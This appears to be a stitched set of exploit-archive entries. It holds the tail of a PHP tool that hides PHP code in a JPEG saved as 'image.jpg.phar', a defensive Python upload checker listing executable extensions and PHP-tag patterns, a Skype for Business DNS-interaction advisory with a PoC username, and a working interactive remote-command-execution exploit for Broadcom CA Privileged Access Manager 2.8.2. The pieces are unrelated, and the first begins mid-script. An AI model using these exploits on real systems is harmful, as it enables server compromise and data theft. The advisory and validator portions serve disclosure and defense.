    $url = $base_url . "/$x/$y/";

    echo "[+] Fetching image ($x X $y) from $url\n";
    file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));

echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.phar\n";

function tryInject($orig, $code, $quality)
{
    $result_file = 'image.jpg.phar';
    $tmp_filename = $orig . '_mod2.jpg';

    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);

    imagejpeg($src, $tmp_filename, $quality);
    $data = file_get_contents($tmp_filename);
    $tmpData = array();

    echo "[+] Jumping to end byte\n";
    $start_byte = findStart($data);

    echo "[+] Searching for valid injection point\n";
    for($i = strlen($data)-1; $i > $start_byte; --$i)
    {
        // Overwrite the bytes ending at offset $i with the payload, re-encode the
        // image and check whether the payload survived the JPEG round trip
        $tmpData = $data;
        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
        {
            $tmpData[$n] = $code[$z];
        }

        $src = imagecreatefromstring($tmpData);
        imagejpeg($src, $result_file, $quality);

        if(checkCodeInFile($result_file, $code))
        {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);

            file_put_contents($result_file, $tmpData);
            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";

            sleep(1);
            $src = imagecreatefromjpeg($result_file);

            return true;
        }
        else
        {
            unlink($result_file);
        }
    }
    unlink($orig);
    unlink($tmp_filename);
    return false;
}

// Offset just past the first SOS (FF DA) marker, i.e. the start of the entropy-coded data
function findStart($str)
{
    for($i = 0; $i < strlen($str) - 1; ++$i)
    {
        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
        {
            return $i+2;
        }
    }

    return -1;
}

function checkCodeInFile($file, $code)
{
    if(file_exists($file))
    {
        $contents = loadFile($file);
    }
    else
    {
        $contents = "0";
    }

    return strstr($contents, $code) !== false;
}

function loadFile($file)
{
    $handle = fopen($file, "r");
    $buffer = fread($handle, filesize($file));
    fclose($handle);

    return $buffer;
}
```
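As an added defender-side example (not from the generator above or from the Verot project), the following Python shows why an upload handler must do more than trust the image bytes: it checks every extension in the name against a server-executable list (so "image.jpg.phar" is caught even though the final extension is not "php"), requires the final extension to be on an allow-list, verifies the JPEG SOI marker, and scans the body for PHP open tags that survive re-encoding. The allow-list and the sample byte strings are constructed stand-ins, not real policy or real images.

```python
import re

# Final extensions the upload handler accepts (constructed allow-list for this example)
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Extensions a PHP-enabled web server may hand to the interpreter; ".phar" is the
# one the generator above appends to image.jpg
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

JPEG_SOI = b"\xff\xd8\xff"                  # every JPEG file starts with FF D8 FF
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def inspect_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means it passed every check."""
    problems = []
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return ["filename has no extension"]
    if parts[-1] not in ALLOWED_IMAGE_EXTENSIONS:
        problems.append("extension .%s is not in the allow-list" % parts[-1])
    # A deny-list applied to the last extension only misses "image.jpg.phar",
    # so every extension in the name is checked
    for ext in parts[1:]:
        if ext in SERVER_EXECUTABLE:
            problems.append("server-executable extension .%s in filename" % ext)
            break
    if parts[-1] in ("jpg", "jpeg") and not data.startswith(JPEG_SOI):
        problems.append("data does not start with a JPEG SOI marker")
    # The generator keeps the file a valid JPEG, so magic bytes alone prove nothing:
    # look for PHP open tags anywhere in the body
    if PHP_OPEN_TAG.search(data):
        problems.append("PHP open tag found in image data")
    return problems


# Constructed stand-ins for uploads (a JFIF header, padding and an end-of-image
# marker); they are not real images
VALID_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
INJECTED_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
                 + b"<?php echo 1; ?>" + b"\xff\xd9")

if __name__ == "__main__":
    for name, blob in (("image.jpg", VALID_JPEG), ("image.jpg.phar", INJECTED_JPEG)):
        print(name, inspect_upload(name, blob) or "accepted")
```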


The latest versions of Microsoft Skype for Business are affected by an external service interaction (DNS) vulnerability. A remote attacker could force the vulnerable server to send a DNS request to any remote server the attacker chooses.

MD5 | 695c9907241fa97e0fd828f91598f381

I. VULNERABILITY
-------------------------
Microsoft Skype for Business External Service Interaction (DNS)
Latest Version

II. CVE REFERENCE
-------------------------
Not Assigned Yet

III. VENDOR
-------------------------
https://www.microsoft.com

IV. TIMELINE
-------------------------
28/11/2019 Vulnerability discovered
03/12/2019 Vendor contacted
04/12/2019 Microsoft replied that “We determined that this behavior is
considered to be by design.”

V. CREDIT
-------------------------
Alphan Yavas from Biznet Bilisim A.S.

VI. DESCRIPTION
-------------------------
The latest versions of Microsoft Skype for Business are affected by an external
service interaction (DNS) vulnerability. A remote attacker could force
the vulnerable server to send DNS requests to any remote server the
attacker chooses.

VII. PROOF OF CONCEPT
-------------------------
Affected Component:
Path(inurl): /Dialin/Conference.aspx
Parameter: Username

The login page of Skype for Business is affected by an external service
interaction (DNS) vulnerability. If the username is sent in the
following format, the victim server will send DNS queries for the xxx
domain (xxx is the domain you want the server to send requests to):

username: ssrf.xxx.com\pentest
password: (doesn't matter)

Reference: https://portswigger.net/kb/issues/00300200_external-service-interaction-dns


Broadcom CA Privileged Access Manager version 2.8.2 suffers from a remote command execution vulnerability.

MD5 | 87439e7b65cfd91d03cf76e57930cd73

# Title: Broadcom CA Privileged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

```
import urllib.request
import urllib.parse
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    """Run a shell command through the unsanitised importID parameter and return its output."""
    cmd = urllib.parse.quote_plus(cmd)
    url = ('https://' + ip + '/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'
           + cmd + '+2>%261||&deviceMode=test')
    request = urllib.request.Request(url, None)
    response = urllib.request.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']


def get_db_value(ip):
    """Read the current ssl_vpn_network value so it can be restored afterwards."""
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip, cmd)
    db_value = db_value.split('\n')[1]
    return db_value


def encode_payload(cmd):
    """Build the command that stores a quote-breaking value (with the user's command) in ssl_vpn_network."""
    sql_string = ("update configuration_f set value='\\';" + cmd
                  + " > /tmp/output;\\'' where name='ssl_vpn_network'")
    cmd = "echo " + base64.b64encode(sql_string.encode()).decode() + " | base64 -d | mysql -u root uag "
    return cmd


def restore_sql(ip, value):
    sql_string = "update configuration_f set value='" + value + "' where name='ssl_vpn_network'"
    cmd = "echo " + base64.b64encode(sql_string.encode()).decode() + " | base64 -d | mysql -u root uag "
    send_command(ip, cmd)


def main():
    print('Xceedium Command Execution PoC by Peter Lapp(lappsec)')

    if len(sys.argv) != 2:
        print("Usage: xceedium_rce.py <ip>")
        sys.exit()

    ip = sys.argv[1]
    print('Enter commands below. Type exit to quit')

    while True:
        cmd = input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value(ip)
        payload = encode_payload(cmd)
        send_command(ip, payload)
        # Trigger step from the original PoC: poke the local service on port 2210
        # so the stored value is processed, then collect the output file
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print(output)
        restore_sql(ip, orig_value)


if __name__ == "__main__":
    main()
```
